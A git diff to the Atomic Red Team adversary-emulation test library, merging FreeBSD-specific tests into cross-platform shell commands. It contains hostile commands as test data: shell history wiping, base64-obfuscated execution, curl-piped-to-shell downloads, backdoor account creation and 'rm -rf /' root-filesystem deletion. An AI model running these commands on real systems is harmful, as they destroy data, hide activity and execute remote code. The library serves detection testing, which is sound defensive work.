+        cleanup_command: '[ "$(uname)" = ''FreeBSD'' ] && service tor stop && sysrc
+          -x tor_enable || sudo systemctl stop tor
 
           '
         name: sh
@@ -81523,33 +81292,6 @@ command-and-control:
 
           '
         name: sh
-    - name: Tor Proxy Usage - FreeBSD
-      auto_generated_guid: 550ec67d-a99e-408b-816a-689271b27d2a
-      description: "This test is designed to launch the tor proxy service, which is
-        what is utilized in the background by the Tor Browser and other applications
-        with add-ons in order to provide onion routing functionality.\nUpon successful
-        execution, the tor proxy service will be launched. \n"
-      supported_platforms:
-      - linux
-      dependency_executor_name: sh
-      dependencies:
-      - description: "Tor must be installed on the machine \n"
-        prereq_command: 'if [ -x "$(command -v tor --version)" ]; then exit 0; else
-          exit 1; fi
-
-          '
-        get_prereq_command: 'pkg install -y tor
-
-          '
-      executor:
-        command: |
-          sysrc tor_enable="YES"
-          service tor start
-        cleanup_command: |
-          service tor stop
-          sysrc -x tor_enable
-        name: sh
-        elevation_required: true
   T1001:
     technique:
       x_mitre_platforms:
@@ -85453,25 +85195,6 @@ collection:
       supported_platforms:
       - linux
       - macos
-      input_arguments:
-        output_file:
-          description: Location to save downloaded discovery.bat file
-          type: path
-          default: "/tmp/T1074.001_discovery.log"
-      executor:
-        command: 'curl -s https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1074.001/src/Discovery.sh
-          | bash -s > #{output_file}
-
-          '
-        name: bash
-    - name: Stage data from Discovery.sh (freebsd)
-      auto_generated_guid: 4fca7b49-379d-4493-8890-d6297750fa46
-      description: 'Utilize curl to download discovery.sh and execute a basic information
-        gathering shell script
-
-        '
-      supported_platforms:
-      - linux
       input_arguments:
         output_file:
           description: Location to save downloaded discovery.bat file
@@ -85479,18 +85202,24 @@ collection:
           default: "/tmp/T1074.001_discovery.log"
       dependency_executor_name: sh
       dependencies:
-      - description: 'Check if curl is installed.
+      - description: 'Check if curl is installed on the machine.
 
           '
-        prereq_command: 'if [ ! -x "$(command -v curl)" ]; then exit 1; else exit
-          0; fi;
+        prereq_command: 'if [ -x "$(command -v curl)" ]; then echo "curl is installed";
+          else echo "curl is NOT installed"; exit 1; fi
+
+          '
+        get_prereq_command: 'which apt && apt update && apt install -y curl || which
+          pkg && pkg update && pkg install -y curl
 
           '
-        get_prereq_command: "(which pkg && pkg install -y curl)\n"
       executor:
         command: 'curl -s https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1074.001/src/Discovery.sh
           | sh -s > #{output_file}
 
+          '
+        cleanup_command: 'rm #{output_file}
+
           '
         name: sh
     - name: Zip a Folder with PowerShell for Staging in Temp
@@ -104315,29 +104044,8 @@ discovery:
 
           '
       executor:
-        command: |
-          lastlog > #{output_file}
-          cat #{output_file}
-        cleanup_command: 'rm -f #{output_file}
-
-          '
-        name: sh
-    - name: Show if a user account has ever logged in remotely (freebsd)
-      auto_generated_guid: 0f73418f-d680-4383-8a24-87bc97fe4e35
-      description: 'Show if a user account has ever logged in remotely
-
-        '
-      supported_platforms:
-      - linux
-      input_arguments:
-        output_file:
-          description: Path where captured results will be placed
-          type: path
-          default: "/tmp/T1087.001.txt"
-      executor:
-        command: |
-          lastlogin > #{output_file}
-          cat #{output_file}
+        command: "[ \"$(uname)\" = 'FreeBSD' ] && cmd=\"lastlogin\" || cmd=\"lastlog\"
+          \n$cmd > #{output_file}\ncat #{output_file}\n"
         cleanup_command: 'rm -f #{output_file}
 
           '
@@ -121807,26 +121515,11 @@ initial-access:
         name: bash
         elevation_required: true
         command: |
-          useradd --shell /bin/bash --create-home --password $(openssl passwd -1 art) art
-          su art
-          whoami
-          exit
-        cleanup_command: "userdel -r art \n"
-    - name: Create local account (FreeBSD)
-      auto_generated_guid: 95158cc9-8f6d-4889-9531-9be3f7f095e0
-      description: 'An adversary may wish to create an account with admin privileges
-        to work with. In this test we create a "art" user with the password art, switch
-        to art, execute whoami, exit and delete the art user.
-
-        '
-      supported_platforms:
-      - linux
-      executor:
-        name: sh
-        elevation_required: true
-        command: "pw useradd art -g wheel -s /bin/sh\necho $(openssl passwd -1 art)
-          | pw mod user testuser1 -h 0      \nsu art\nwhoami\nexit\n"
-        cleanup_command: 'rmuser -y art
+          password=$(openssl passwd -1 art)
+          ([ "$(uname)" = 'Linux' ] && useradd --shell /bin/bash --create-home --password $password art) || (pw useradd art -g wheel -s /bin/sh && (echo $password | pw mod user testuser1 -h 0))
+          su art -c "whoami; exit"
+        cleanup_command: '[ "$(uname)" = ''Linux'' ] && userdel art -rf || rmuser
+          -y art
 
           '
     - name: Reactivate a locked/expired account (Linux)
diff --git a/atomics/Indexes/linux-index.yaml b/atomics/Indexes/linux-index.yaml
index 8adb1462f..46687e4cf 100644
--- a/atomics/Indexes/linux-index.yaml
+++ b/atomics/Indexes/linux-index.yaml
@@ -4615,23 +4615,16 @@ defense-evasion:
       description: 'Clears bash history via rm
 
         '
+      input_arguments:
+        history_path:
+          description: Bash history path
+          type: path
+          default: "~/.bash_history"
       supported_platforms:
       - linux
       - macos
       executor:
-        command: 'rm ~/.bash_history
-
-          '
-        name: sh
-    - name: Clear sh history (rm)
-      auto_generated_guid: 448893f8-1d5d-4ae2-9017-7fcd73a7e100
-      description: 'Clears sh history via rm
-
-        '
-      supported_platforms:
-      - linux
-      executor:
-        command: 'rm ~/.sh_history
+        command: 'rm #{history_path}
 
           '
         name: sh
@@ -4640,22 +4633,15 @@ defense-evasion:
       description: 'Clears bash history via echo
 
         '
+      input_arguments:
+        history_path:
+          description: Bash history path
+          type: path
+          default: "~/.bash_history"
       supported_platforms:
       - linux
       executor:
-        command: 'echo "" > ~/.bash_history
-
-          '
-        name: sh
-    - name: Clear sh history (echo)
-      auto_generated_guid: a4d63cb3-9ed9-4837-9480-5bf6b09a6c96
-      description: 'Clears sh history via echo
-
-        '
-      supported_platforms:
-      - linux
-      executor:
-        command: 'echo "" > ~/.sh_history
+        command: 'echo "" > #{history_path}
 
           '
         name: sh
@@ -4667,20 +4653,13 @@ defense-evasion:
       supported_platforms:
       - linux
       - macos
+      input_arguments:
+        history_path:
+          description: Bash history path
+          type: path
+          default: "~/.bash_history"
       executor:
-        command: 'cat /dev/null > ~/.bash_history
-
-          '
-        name: sh
-    - name: Clear sh history (cat dev/null)
-      auto_generated_guid: ecaefd53-6fa4-4781-ba51-d9d6fb94dbdc
-      description: 'Clears sh history via cat /dev/null
-
-        '
-      supported_platforms:
-      - linux
-      executor:
-        command: 'cat /dev/null > ~/.sh_history
+        command: 'cat /dev/null > #{history_path}
 
           '
         name: sh
@@ -4692,20 +4671,13 @@ defense-evasion:
       supported_platforms:
       - linux
       - macos
+      input_arguments:
+        history_path:
+          description: Bash history path
+          type: path
+          default: "~/.bash_history"
       executor:
-        command: 'ln -sf /dev/null ~/.bash_history
-
-          '
-        name: sh
-    - name: Clear sh history (ln dev/null)
-      auto_generated_guid: 3126aa7a-8768-456f-ae05-6ab2d4accfdd
-      description: 'Clears sh history via a symlink to /dev/null
-
-        '
-      supported_platforms:
-      - linux
-      executor:
-        command: 'ln -sf /dev/null ~/.sh_history
+        command: 'ln -sf /dev/null #{history_path}
 
           '
         name: sh
@@ -4716,20 +4688,13 @@ defense-evasion:
         '
       supported_platforms:
       - linux
+      input_arguments:
+        history_path:
+          description: Bash history path
+          type: path
+          default: "~/.bash_history"
       executor:
-        command: 'truncate -s0 ~/.bash_history
-
-          '
-        name: sh
-    - name: Clear sh history (truncate)
-      auto_generated_guid: e14d9bb0-c853-4503-aa89-739d5c0a5818
-      description: 'Clears sh history via truncate
-
-        '
-      supported_platforms:
-      - linux
-      executor:
-        command: 'truncate -s0 ~/.sh_history
+        command: 'truncate -s0 #{history_path}
 
           '
         name: sh
@@ -4748,22 +4713,6 @@ defense-evasion:
           export HISTFILESIZE=0
           history -c
         name: sh
-    - name: Clear history of a bunch of shells (freebsd)
-      auto_generated_guid: 9bf7c8af-5e12-42ea-bf6b-b0348fb9dfb0
-      description: 'Clears the history of a bunch of different shell types by setting
-        the history size to zero
-
-        '
-      supported_platforms:
-      - linux
-      executor:
-        command: |
-          unset HISTFILE
-          unset histfile
-          export HISTFILESIZE=0
-          export HISTSIZE=0
-          history -c
-        name: sh
     - name: Clear and Disable Bash History Logging
       auto_generated_guid: 784e4011-bd1a-4ecd-a63a-8feb278512e6
       description: 'Clears the history and disable bash history logging of the current
@@ -4814,41 +4763,15 @@ defense-evasion:
         prereq_command: "$(getent passwd testuser1 >/dev/null) && $(which sshpass
           >/dev/null)\n"
         get_prereq_command: |
-          /usr/sbin/useradd testuser1
-          echo -e 'pwd101!\npwd101!' | passwd testuser1
-          (which yum && yum -y install epel-release sshpass)||(which apt-get && DEBIAN_FRONTEND=noninteractive apt-get install -y sshpass)
+          [ "$(uname)" = 'FreeBSD' ] && pw useradd testuser1 -g wheel -s /bin/sh || /usr/sbin/useradd testuser1
+          [ "$(uname)" = 'FreeBSD' ] && echo 'pwd101!' | pw mod user testuser1 -h 0 || echo -e 'pwd101!\npwd101!' | passwd testuser1
+          (which yum && yum -y install epel-release sshpass)||(which apt-get && DEBIAN_FRONTEND=noninteractive apt-get install -y sshpass)||(which pkg && pkg install -y sshpass)
       executor:
         command: 'sshpass -p ''pwd101!'' ssh testuser1@localhost -T hostname
 
           '
-        cleanup_command: 'userdel -f testuser1
-
-          '
-        name: sh
-    - name: Disable sh History Logging with SSH -T (freebsd)
-      auto_generated_guid: ec3f2306-dd19-4c4b-bed7-92d20e9b1dee
-      description: 'Keeps history clear and stays out of lastlog,wtmp,btmp ssh -T
-        keeps the ssh client from catching a proper TTY, which is what usually gets
-        logged on lastlog
-
-        '
-      supported_platforms:
-      - linux
-      dependencies:
-      - description: 'Install sshpass and create user account used for excuting
-
-          '
-        prereq_command: "$(getent passwd testuser1 >/dev/null) && $(which sshpass
-          >/dev/null)\n"
-        get_prereq_command: |
-          pw useradd testuser1 -g wheel -s /bin/sh
-          echo 'pwd101!' | pw mod user testuser1 -h 0
-          (which pkg && pkg install -y sshpass)
-      executor:
-        command: 'sshpass -p ''pwd101!'' ssh testuser1@localhost -T hostname
-
-          '
-        cleanup_command: 'rmuser -y testuser1
+        cleanup_command: '[ "$(uname)" = ''FreeBSD'' ] && rmuser -y testuser1 || userdel
+          -f testuser1
 
           '
         name: sh
@@ -17875,23 +17798,10 @@ defense-evasion:
       supported_platforms:
       - linux
       executor:
-        command: 'rm -rf / --no-preserve-root > /dev/null 2> /dev/null
+        command: '[ "$(uname)" = ''Linux'' ] && rm -rf / --no-preserve-root > /dev/null
+          2> /dev/null || chflags -R 0 / && rm -rf / > /dev/null 2> /dev/null
 
           '
-        name: bash
-    - name: Delete Filesystem - FreeBSD
-      auto_generated_guid: b5aaca7e-a48f-4f1b-8f0f-a27b8f516608
-      description: 'This test deletes the entire root filesystem of a FreeBSD system.
-        This technique was used by Amnesia IoT malware to avoid analysis. This test
-        is dangerous and destructive, do NOT use on production equipment.
-
-        '
-      supported_platforms:
-      - linux
-      executor:
-        command: |
-          chflags -R 0 /
-          rm -rf / > /dev/null 2> /dev/null
         name: sh
   T1158:
     technique:
@@ -20358,26 +20268,11 @@ defense-evasion:
         name: bash
         elevation_required: true
         command: |
-          useradd --shell /bin/bash --create-home --password $(openssl passwd -1 art) art
-          su art
-          whoami
-          exit
-        cleanup_command: "userdel -r art \n"
-    - name: Create local account (FreeBSD)
-      auto_generated_guid: 95158cc9-8f6d-4889-9531-9be3f7f095e0
-      description: 'An adversary may wish to create an account with admin privileges
-        to work with. In this test we create a "art" user with the password art, switch
-        to art, execute whoami, exit and delete the art user.
-
-        '
-      supported_platforms:
-      - linux
-      executor:
-        name: sh
-        elevation_required: true
-        command: "pw useradd art -g wheel -s /bin/sh\necho $(openssl passwd -1 art)
-          | pw mod user testuser1 -h 0      \nsu art\nwhoami\nexit\n"
-        cleanup_command: 'rmuser -y art
+          password=$(openssl passwd -1 art)
+          ([ "$(uname)" = 'Linux' ] && useradd --shell /bin/bash --create-home --password $password art) || (pw useradd art -g wheel -s /bin/sh && (echo $password | pw mod user testuser1 -h 0))
+          su art -c "whoami; exit"
+        cleanup_command: '[ "$(uname)" = ''Linux'' ] && userdel art -rf || rmuser
+          -y art
 
           '
     - name: Reactivate a locked/expired account (Linux)
@@ -32629,26 +32524,11 @@ privilege-escalation:
         name: bash
         elevation_required: true
         command: |
-          useradd --shell /bin/bash --create-home --password $(openssl passwd -1 art) art
-          su art
-          whoami
-          exit
-        cleanup_command: "userdel -r art \n"
-    - name: Create local account (FreeBSD)
-      auto_generated_guid: 95158cc9-8f6d-4889-9531-9be3f7f095e0
-      description: 'An adversary may wish to create an account with admin privileges
-        to work with. In this test we create a "art" user with the password art, switch
-        to art, execute whoami, exit and delete the art user.
-
-        '
-      supported_platforms:
-      - linux
-      executor:
-        name: sh
-        elevation_required: true
-        command: "pw useradd art -g wheel -s /bin/sh\necho $(openssl passwd -1 art)
-          | pw mod user testuser1 -h 0      \nsu art\nwhoami\nexit\n"
-        cleanup_command: 'rmuser -y art
+          password=$(openssl passwd -1 art)
+          ([ "$(uname)" = 'Linux' ] && useradd --shell /bin/bash --create-home --password $password art) || (pw useradd art -g wheel -s /bin/sh && (echo $password | pw mod user testuser1 -h 0))
+          su art -c "whoami; exit"
+        cleanup_command: '[ "$(uname)" = ''Linux'' ] && userdel art -rf || rmuser
+          -y art
 
           '
     - name: Reactivate a locked/expired account (Linux)
@@ -36017,29 +35897,14 @@ execution:
         '
       supported_platforms:
       - linux
-      executor:
-        name: sh
-        elevation_required: false
-        command: "ART=$(echo -n \"id\" |base64 -w 0)\necho \"\\$ART=$ART\"\necho -n
-          \"$ART\" |base64 -d |/bin/bash\nunset ART \n"
-    - name: Obfuscated command line scripts (freebsd)
-      auto_generated_guid: 5dc1d9dd-f396-4420-b985-32b1c4f79062
-      description: 'An adversary may pre-compute the base64 representations of the
-        terminal commands that they wish to execute in an attempt to avoid or frustrate
-        detection. The following commands base64 encodes the text string id, then
-        base64 decodes the string, then pipes it as a command to bash, which results
-        in the id command being executed.
-
-        '
-      supported_platforms:
-      - linux
       executor:
         name: sh
         elevation_required: false
         command: |
-          ART=$(echo -n "id" |b64encode -r -)
+          [ "$(uname)" = 'FreeBSD' ] && encodecmd="b64encode -r -" && decodecmd="b64decode -r" || encodecmd="base64 -w 0" && decodecmd="base64 -d"
+          ART=$(echo -n "id" | $encodecmd)
           echo "\$ART=$ART"
-          echo -n "$ART" |b64decode -r |/bin/sh
+          echo -n "$ART" | $decodecmd |/bin/bash
           unset ART
     - name: Change login shell
       auto_generated_guid: c7ac59cb-13cc-4622-81dc-6d2fee9bfac7
@@ -36065,42 +35930,12 @@ execution:
         name: bash
         elevation_required: true
         command: |
-          useradd -s /bin/bash art
+          [ "$(uname)" = 'FreeBSD' ] && pw useradd art -g wheel -s /bin/csh || useradd -s /bin/bash art
           cat /etc/passwd |grep ^art
           chsh -s /bin/sh art
           cat /etc/passwd |grep ^art
-        cleanup_command: 'userdel art
-
-          '
-    - name: Change login shell (freebsd)
-      auto_generated_guid: 33b68b9b-4988-4caf-9600-31b7bf04227c
-      description: "An adversary may want to use a different login shell. The chsh
-        command changes the user login shell. The following test, creates an art user
-        with a /bin/sh shell, changes the users shell to sh, then deletes the art
-        user. \n"
-      supported_platforms:
-      - linux
-      dependencies:
-      - description: 'chsh - change login shell, must be installed
-
-          '
-        prereq_command: 'if [ -f /usr/bin/chsh ]; then echo "exit 0"; else echo "exit
-          1"; exit 1; fi
-
-          '
-        get_prereq_command: 'echo "Automated installer not implemented yet, please
-          install chsh manually"
-
-          '
-      executor:
-        name: sh
-        elevation_required: true
-        command: |
-          pw useradd art -g wheel -s /bin/csh
-          cat /etc/passwd |grep ^art
-          chsh -s /bin/sh art
-          cat /etc/passwd |grep ^art
-        cleanup_command: 'rmuser -y art
+        cleanup_command: '[ "$(uname)" = ''FreeBSD'' ] && rmuser -y art || userdel
+          art
 
           '
     - name: Environment variable scripts
@@ -36113,25 +35948,6 @@ execution:
         '
       supported_platforms:
       - linux
-      executor:
-        name: bash
-        elevation_required: false
-        command: |
-          export ART='echo "Atomic Red Team was here... T1059.004"'
-          echo $ART |/bin/bash
-        cleanup_command: 'unset ART
-
-          '
-    - name: Environment variable scripts (freebsd)
-      auto_generated_guid: 663b205d-2121-48a3-a6f9-8c9d4d87dfee
-      description: 'An adversary may place scripts in an environment variable because
-        they can''t or don''t wish to create script files on the host. The following
-        test, in a bash shell, exports the ART variable containing an echo command,
-        then pipes the variable to /bin/sh
-
-        '
-      supported_platforms:
-      - linux
       executor:
         name: sh
         elevation_required: false
@@ -36162,59 +35978,24 @@ execution:
           default: https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.004/src/pipe-to-shell.sh
       dependency_executor_name: bash
       dependencies:
-      - description: 'Check if running on a Debian based machine.
+      - description: 'Check if curl is installed on the machine.
 
           '
-        prereq_command: |
-          if grep -iq "debian\|ubuntu\|kali\|mint" /usr/lib/os-release; then echo "Debian"; else echo "NOT Debian"; exit 1; fi
-          if [ -x "$(command -v curl)" ]; then echo "curl is installed"; else echo "curl is NOT installed"; exit 1; fi
-        get_prereq_command: 'apt update && apt install -y curl
+        prereq_command: 'if [ -x "$(command -v curl)" ]; then echo "curl is installed";
+          else echo "curl is NOT installed"; exit 1; fi
 
           '
-      executor:
-        name: bash
-        elevation_required: false
-        command: "cd /tmp\ncurl -s #{remote_url}\nls -la /tmp/art.txt\ncurl -s #{remote_url}
-          |bash\nls -la /tmp/art.txt      \n"
-        cleanup_command: 'rm /tmp/art.txt
-
-          '
-    - name: Detecting pipe-to-shell (freebsd)
-      auto_generated_guid: 1a06b1ec-0cca-49db-a222-3ebb6ef25632
-      description: 'An adversary may develop a useful utility or subvert the CI/CD
-        pipe line of a legitimate utility developer, who requires or suggests installing
-        their utility by piping a curl download directly into bash. Of-course this
-        is a very bad idea. The adversary may also take advantage of this BLIND install
-        method and selectively running extra commands in the install script for those
-        who DO pipe to bash and not for those who DO NOT. This test uses curl to download
-        the pipe-to-shell.sh script, the first time without piping it to bash and
-        the second piping it into bash which executes the echo command.
-
-        '
-      supported_platforms:
-      - linux
-      input_arguments:
-        remote_url:
-          description: url of remote payload
-          type: url
-          default: https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.004/src/pipe-to-shell.sh
-      dependency_executor_name: sh
-      dependencies:
-      - description: 'Check if running on a Debian based machine.
-
-          '
-        prereq_command: |
-          if grep -iq "FreeBSD" /etc/os-release; then echo "FreeBSD"; else echo "NOT FreeBSD"; exit 1; fi
-          if [ -x "$(command -v curl)" ]; then echo "curl is installed"; else echo "curl is NOT installed"; exit 1; fi
-        get_prereq_command: 'pkg update && pkg install -y curl
+        get_prereq_command: 'which apt && apt update && apt install -y curl || which
+          pkg && pkg update && pkg install -y curl
 
           '
       executor:
         name: sh
         elevation_required: false
-        command: "cd /tmp\ncurl -s #{remote_url}\nls -la /tmp/art.txt\ncurl -s #{remote_url}
-          |bash\nls -la /tmp/art.txt      \n"
-        cleanup_command: "rm /tmp/art.txt      \n"
+        command: "cd /tmp\ncurl -s #{remote_url} |bash\nls -la /tmp/art.txt      \n"
+        cleanup_command: 'rm /tmp/art.txt
+
+          '
     - name: Current kernel information enumeration
       auto_generated_guid: 3a53734a-9e26-4f4b-ad15-059e767f5f14
       description: 'An adversary may want to enumerate the kernel information to tailor
@@ -51646,26 +51427,11 @@ persistence:
         name: bash
         elevation_required: true
         command: |
-          useradd --shell /bin/bash --create-home --password $(openssl passwd -1 art) art
-          su art
-          whoami
-          exit
-        cleanup_command: "userdel -r art \n"
-    - name: Create local account (FreeBSD)
-      auto_generated_guid: 95158cc9-8f6d-4889-9531-9be3f7f095e0
-      description: 'An adversary may wish to create an account with admin privileges
-        to work with. In this test we create a "art" user with the password art, switch
-        to art, execute whoami, exit and delete the art user.
-
-        '
-      supported_platforms:
-      - linux
-      executor:
-        name: sh
-        elevation_required: true
-        command: "pw useradd art -g wheel -s /bin/sh\necho $(openssl passwd -1 art)
-          | pw mod user testuser1 -h 0      \nsu art\nwhoami\nexit\n"
-        cleanup_command: 'rmuser -y art
+          password=$(openssl passwd -1 art)
+          ([ "$(uname)" = 'Linux' ] && useradd --shell /bin/bash --create-home --password $password art) || (pw useradd art -g wheel -s /bin/sh && (echo $password | pw mod user testuser1 -h 0))
+          su art -c "whoami; exit"
+        cleanup_command: '[ "$(uname)" = ''Linux'' ] && userdel art -rf || rmuser
+          -y art
 
           '
     - name: Reactivate a locked/expired account (Linux)
@@ -53579,7 +53345,7 @@ command-and-control:
       - 'Network Traffic: Network Connection Creation'
       identifier: T1090.003
     atomic_tests:
-    - name: Tor Proxy Usage - Debian/Ubuntu
+    - name: Tor Proxy Usage - Debian/Ubuntu/FreeBSD
       auto_generated_guid: 5ff9d047-6e9c-4357-b39b-5cf89d9b59c7
       description: "This test is designed to launch the tor proxy service, which is
         what is utilized in the background by the Tor Browser and other applications
@@ -53594,41 +53360,17 @@ command-and-control:
           exit 1; fi
 
           '
-        get_prereq_command: 'sudo apt-get -y install tor
-
-          '
+        get_prereq_command: "(which apt && sudo apt-get -y install tor) || (which
+          pkg && pkg install -y tor)\n"
       executor:
-        command: "sudo systemctl start tor \n"
-        cleanup_command: 'sudo systemctl stop tor
+        command: '[ "$(uname)" = ''FreeBSD'' ] && sysrc tor_enable="YES" && service
+          tor start || sudo systemctl start tor
 
           '
-        name: sh
-        elevation_required: true
-    - name: Tor Proxy Usage - FreeBSD
-      auto_generated_guid: 550ec67d-a99e-408b-816a-689271b27d2a
-      description: "This test is designed to launch the tor proxy service, which is
-        what is utilized in the background by the Tor Browser and other applications
-        with add-ons in order to provide onion routing functionality.\nUpon successful
-        execution, the tor proxy service will be launched. \n"
-      supported_platforms:
-      - linux
-      dependency_executor_name: sh
-      dependencies:
-      - description: "Tor must be installed on the machine \n"
-        prereq_command: 'if [ -x "$(command -v tor --version)" ]; then exit 0; else
-          exit 1; fi
+        cleanup_command: '[ "$(uname)" = ''FreeBSD'' ] && service tor stop && sysrc
+          -x tor_enable || sudo systemctl stop tor
 
           '
-        get_prereq_command: 'pkg install -y tor
-
-          '
-      executor:
-        command: |
-          sysrc tor_enable="YES"
-          service tor start
-        cleanup_command: |
-          service tor stop
-          sysrc -x tor_enable
         name: sh
         elevation_required: true
   T1001:
@@ -56239,25 +55981,6 @@ collection:
       supported_platforms:
       - linux
       - macos
-      input_arguments:
-        output_file:
-          description: Location to save downloaded discovery.bat file
-          type: path
-          default: "/tmp/T1074.001_discovery.log"
-      executor:
-        command: 'curl -s https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1074.001/src/Discovery.sh
-          | bash -s > #{output_file}
-
-          '
-        name: bash
-    - name: Stage data from Discovery.sh (freebsd)
-      auto_generated_guid: 4fca7b49-379d-4493-8890-d6297750fa46
-      description: 'Utilize curl to download discovery.sh and execute a basic information
-        gathering shell script
-
-        '
-      supported_platforms:
-      - linux
       input_arguments:
         output_file:
           description: Location to save downloaded discovery.bat file
@@ -56265,18 +55988,24 @@ collection:
           default: "/tmp/T1074.001_discovery.log"
       dependency_executor_name: sh
       dependencies:
-      - description: 'Check if curl is installed.
+      - description: 'Check if curl is installed on the machine.
 
           '
-        prereq_command: 'if [ ! -x "$(command -v curl)" ]; then exit 1; else exit
-          0; fi;
+        prereq_command: 'if [ -x "$(command -v curl)" ]; then echo "curl is installed";
+          else echo "curl is NOT installed"; exit 1; fi
+
+          '
+        get_prereq_command: 'which apt && apt update && apt install -y curl || which
+          pkg && pkg update && pkg install -y curl
 
           '
-        get_prereq_command: "(which pkg && pkg install -y curl)\n"
       executor:
         command: 'curl -s https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1074.001/src/Discovery.sh
           | sh -s > #{output_file}
 
+          '
+        cleanup_command: 'rm #{output_file}
+
           '
         name: sh
   T1114.001:
@@ -68728,29 +68457,8 @@ discovery:
 
           '
       executor:
-        command: |
-          lastlog > #{output_file}
-          cat #{output_file}
-        cleanup_command: 'rm -f #{output_file}
-
-          '
-        name: sh
-    - name: Show if a user account has ever logged in remotely (freebsd)
-      auto_generated_guid: 0f73418f-d680-4383-8a24-87bc97fe4e35
-      description: 'Show if a user account has ever logged in remotely
-
-        '
-      supported_platforms:
-      - linux
-      input_arguments:
-        output_file:
-          description: Path where captured results will be placed
-          type: path
-          default: "/tmp/T1087.001.txt"
-      executor:
-        command: |
-          lastlogin > #{output_file}
-          cat #{output_file}
+        command: "[ \"$(uname)\" = 'FreeBSD' ] && cmd=\"lastlogin\" || cmd=\"lastlog\"
+          \n$cmd > #{output_file}\ncat #{output_file}\n"
         cleanup_command: 'rm -f #{output_file}
 
           '
@@ -81693,26 +81401,11 @@ initial-access:
         name: bash
         elevation_required: true
         command: |
-          useradd --shell /bin/bash --create-home --password $(openssl passwd -1 art) art
-          su art
-          whoami
-          exit
-        cleanup_command: "userdel -r art \n"
-    - name: Create local account (FreeBSD)
-      auto_generated_guid: 95158cc9-8f6d-4889-9531-9be3f7f095e0
-      description: 'An adversary may wish to create an account with admin privileges
-        to work with. In this test we create a "art" user with the password art, switch
-        to art, execute whoami, exit and delete the art user.
-
-        '
-      supported_platforms:
-      - linux
-      executor:
-        name: sh
-        elevation_required: true
-        command: "pw useradd art -g wheel -s /bin/sh\necho $(openssl passwd -1 art)
-          | pw mod user testuser1 -h 0      \nsu art\nwhoami\nexit\n"
-        cleanup_command: 'rmuser -y art
+          password=$(openssl passwd -1 art)
+          ([ "$(uname)" = 'Linux' ] && useradd --shell /bin/bash --create-home --password $password art) || (pw useradd art -g wheel -s /bin/sh && (echo $password | pw mod user testuser1 -h 0))
+          su art -c "whoami; exit"
+        cleanup_command: '[ "$(uname)" = ''Linux'' ] && userdel art -rf || rmuser
+          -y art
 
           '
     - name: Reactivate a locked/expired account (Linux)
diff --git a/atomics/Indexes/macos-index.yaml b/atomics/Indexes/macos-index.yaml
index 6e9efe78f..2488df738 100644
--- a/atomics/Indexes/macos-index.yaml
+++ b/atomics/Indexes/macos-index.yaml
@@ -4322,11 +4322,16 @@ defense-evasion:
       description: 'Clears bash history via rm
 
         '
+      input_arguments:
+        history_path:
+          description: Bash history path
+          type: path
+          default: "~/.bash_history"
       supported_platforms:
       - linux
       - macos
       executor:
-        command: 'rm ~/.bash_history
+        command: 'rm #{history_path}
 
           '
         name: sh
@@ -4338,8 +4343,13 @@ defense-evasion:
       supported_platforms:
       - linux
       - macos
+      input_arguments:
+        history_path:
+          description: Bash history path
+          type: path
+          default: "~/.bash_history"
       executor:
-        command: 'cat /dev/null > ~/.bash_history
+        command: 'cat /dev/null > #{history_path}
 
           '
         name: sh
@@ -4351,8 +4361,13 @@ defense-evasion:
       supported_platforms:
       - linux
       - macos
+      input_arguments:
+        history_path:
+          description: Bash history path
+          type: path
+          default: "~/.bash_history"
       executor:
-        command: 'ln -sf /dev/null ~/.bash_history
+        command: 'ln -sf /dev/null #{history_path}
 
           '
         name: sh
@@ -52543,12 +52558,28 @@ collection:
           description: Location to save downloaded discovery.bat file
           type: path
           default: "/tmp/T1074.001_discovery.log"
-      executor:
-        command: 'curl -s https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1074.001/src/Discovery.sh
-          | bash -s > #{output_file}
+      dependency_executor_name: sh
+      dependencies:
+      - description: 'Check if curl is installed on the machine.
 
           '
-        name: bash
+        prereq_command: 'if [ -x "$(command -v curl)" ]; then echo "curl is installed";
+          else echo "curl is NOT installed"; exit 1; fi
+
+          '
+        get_prereq_command: 'which apt && apt update && apt install -y curl || which
+          pkg && pkg update && pkg install -y curl
+
+          '
+      executor:
+        command: 'curl -s https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1074.001/src/Discovery.sh
+          | sh -s > #{output_file}
+
+          '
+        cleanup_command: 'rm #{output_file}
+
+          '
+        name: sh
   T1114.001:
     technique:
       x_mitre_platforms:
diff --git a/atomics/T1059.004/T1059.004.md b/atomics/T1059.004/T1059.004.md
index 4f4790ab9..9c0f8dacc 100644
--- a/atomics/T1059.004/T1059.004.md
+++ b/atomics/T1059.004/T1059.004.md
@@ -26,21 +26,13 @@ Adversaries may abuse Unix shells to execute various commands or payloads. Inter
 
 - [Atomic Test #9 - Obfuscated command line scripts](#atomic-test-9---obfuscated-command-line-scripts)
 
-- [Atomic Test #10 - Obfuscated command line scripts (freebsd)](#atomic-test-10---obfuscated-command-line-scripts-freebsd)
+- [Atomic Test #10 - Change login shell](#atomic-test-10---change-login-shell)
 
-- [Atomic Test #11 - Change login shell](#atomic-test-11---change-login-shell)
+- [Atomic Test #11 - Environment variable scripts](#atomic-test-11---environment-variable-scripts)
 
-- [Atomic Test #12 - Change login shell (freebsd)](#atomic-test-12---change-login-shell-freebsd)
+- [Atomic Test #12 - Detecting pipe-to-shell](#atomic-test-12---detecting-pipe-to-shell)
 
-- [Atomic Test #13 - Environment variable scripts](#atomic-test-13---environment-variable-scripts)
-
-- [Atomic Test #14 - Environment variable scripts (freebsd)](#atomic-test-14---environment-variable-scripts-freebsd)
-
-- [Atomic Test #15 - Detecting pipe-to-shell](#atomic-test-15---detecting-pipe-to-shell)
-
-- [Atomic Test #16 - Detecting pipe-to-shell (freebsd)](#atomic-test-16---detecting-pipe-to-shell-freebsd)
-
-- [Atomic Test #17 - Current kernel information enumeration](#atomic-test-17---current-kernel-information-enumeration)
+- [Atomic Test #13 - Current kernel information enumeration](#atomic-test-13---current-kernel-information-enumeration)
 
 
 <br/>
@@ -360,9 +352,10 @@ An adversary may pre-compute the base64 representations of the terminal commands
 
 
 ```sh
-ART=$(echo -n "id" |base64 -w 0)
